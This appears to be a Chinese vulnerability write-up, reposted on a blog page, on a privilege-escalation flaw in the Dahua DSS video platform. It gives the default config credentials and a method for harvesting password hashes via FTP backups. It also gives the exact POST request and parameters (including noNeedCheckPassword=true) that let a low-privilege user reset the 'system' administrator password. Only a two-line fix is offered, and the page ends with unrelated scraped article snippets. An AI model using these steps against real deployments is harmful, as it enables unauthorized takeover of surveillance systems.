大华DSS平台低权限账户越权直接修改system密码

前提:拥有config配置用户名密码

被测试DSS版本信息:V3.11.003.R.20150929.374164

前提:拥有config配置用户名密码

一.取得所有用户名

1.进入config管理界面

地址:http://[IP]/config/user_toLoginPage.action

默认用户名admin密码123456

2.配置自动SQL备份FTP服务器

3.等待自动备份

4.从备份的SQL文件中获得所有账户的用户名,密码(MD5)

5. 测试账户弱口令,取得一个低权限账户

二.

1.web登录低权限账户(获得登录cookie)

2.POST提交强制修改密码的url(保持低权限账户的cookie)

我直接用的火狐在浏览器中提交的

http://【IP】/admin/user_updatePassword.action?nowTime=【时间戳】

POST信息:

noNeedCheckPassword=true

userBean.loginName=system 被改密码的用户名

userBean.id=1被改的用户ID(数据文件中获取)

userBean.newLoginPass=7e9038a26b85dc9b7d5089a1b1d7e00c 新密码MD5

MD5加密格式:

用户名:DSS:密码

(逆向JS所得)

三.完毕

经核实:所用的低权限账号是没有管理员权限的

解决方案:

弱口令和默认修改下可以简单解决

修改密码的提交增加权限认证

大华平台linux密码,大华DSS平台低权限账户越权直接修改system密码相关推荐

  1. Linux三大主流网站构建平台,Linux快速构建LAMP网站平台

    1.1 问题 本例要求基于Linux主机快速构建LAMP动态网站平台,并确保可以支撑PHP应用及数据库,完成下列任务: 1)安装LAMP平台各组件,启动LAMP平台 软件包:httpd.mariadb ...

  2. linux切换用户su自动输入密码,Linux切换用户出现【su:命令鉴定故障】问题修改的密码位数必须大于8位的问题...

    一.切换到普通用户出现  su:命令鉴定故障 创建用户设置好密码后,从root用户进入普通用户是不需要输入密码的,但是我切换到另一个普通用户,进行普通用户之间的切换的时候,出现了[su:命令鉴定故障] ...

  3. sqlplus 修改system密码_华为交换机console密码忘了如何解决 华为交换机console密码忘了解决方法【介绍】...

    一.启动时,按Ctrl+B进入BOOTROM目录 二.输入BOOTROM的密码 · 盒式交换机的某些款型支持运用快捷键"Ctrl+E"进入BootROM主菜单,请根据设备的界面提示 ...

  4. linux 打开大文件命令,linux下大文件的读取

    最近遇到的现实问题就是经常需要读取大小超过1G的大文本文件.常规的软件或者方法基本上无能为力.在网上找了好多方法,汇总一下最好的,分享. 1)如果是在windows下读取这种大文件的话,只找到一个叫l ...

  5. linux 打开大文件命令,linux查看大文本文件命令

    linux 查看超大文本文件内容 现在有一个应用的日志,大小在5G左右.想要用linux命令去查看该文件中的如果你的日志是一行一行的,而你要提取的关键字为"ERROR"所在的整行内 ...

  6. linux命令大全文档,LINUX命令大全文档

    LINUX命令大全- - Linux命令笔记 Submitted by Patrick on 2005, June 29, 4:18 PM.Linux[字体:大中小] 用umask 命令,在/etc/ ...

  7. 查找服务器大文件内容,Linux查找大文件命令,springmvc基础面试题

    1.查询服务器中大于1G的文件 ============================================================================== find ...

  8. linux算法平台,Linux实时调度算法与测试平台的研究与实现

    摘要: 实时系统在过去几年里迅速成长,但能够提供实时功能的操作系统往往价格极为昂贵.由于Linux代码公开,且性能优异,使其成为实时操作系统领域里的新宠.然而Linux本身作为一个通用的分时操作系统, ...

  9. origin平台linux,EA Origin游戏服务平台任意代码执行漏洞

    发布日期:2013-03-07 更新日期:2013-03-20 受影响系统: origin Origin 描述: ------------------------------------------- ...

最新文章

  1. Linux 命令 top 学习总结
  2. 你的vs.net 2005过期了吗?
  3. 计算平面坐标某点(x,y)与原点(0,0)的角度
  4. Kafka—配置SASL/PLAIN认证客户端及常用操作命令
  5. u-boot移植随笔:System.map文件格式
  6. java shutdowninput,java中socket.shutdownOutput()使用后如果还想用输出流怎么办
  7. 在 Linux 命令行中使用和执行 PHP 代码(一)
  8. ADO.NET 数据库操作类
  9. linux 怎么查看谁登过这台服务器,如何查看linux服务器是否被入侵
  10. 学到了林海峰,武沛齐讲的Day17-5 内置函数
  11. 【PTA 7-9】剥洋葱
  12. Spring自定义参数解析器
  13. matlab重叠保留法,【matlab实现】重叠相加法与重叠保留法
  14. Exposure X7胶片滤镜模拟软件 PS/LR调色插件 500+特效预设
  15. 2021网易云任务全自动每日打卡300首搭建教程
  16. Eclipse 一直 invoking Maven Project Bulider 问题
  17. CATIA CAA二次开发专题(八)---自定义特征模型
  18. ElasticSearch教程与实战:从搭建服务到Spring Boot整合
  19. 看EyeEm如何在产品开发中整合、运用深度学习模型
  20. linux java excel文件_使用Java语言将excel中读取到的内容导入Linux的文件中

热门文章

  1. 团建活动随感(r11笔记第9天)
  2. 于是,我搭了个自己的博客网站
  3. 《那些年啊,那些事——一个程序员的奋斗史》——25
  4. 杨氏集团出品:打怪小游戏
  5. 文件服务器 架构图,传奇世界服务端架构图(说明文件),适合新手看
  6. 宣州谢脁楼饯别校书叔云
  7. 图片优化之Base64解决方案
  8. MyBatis 第二扇门
  9. 万丈高楼平地起 AI帮你做自己
  10. 第一篇--读刘同的《别做那只迷途的候鸟》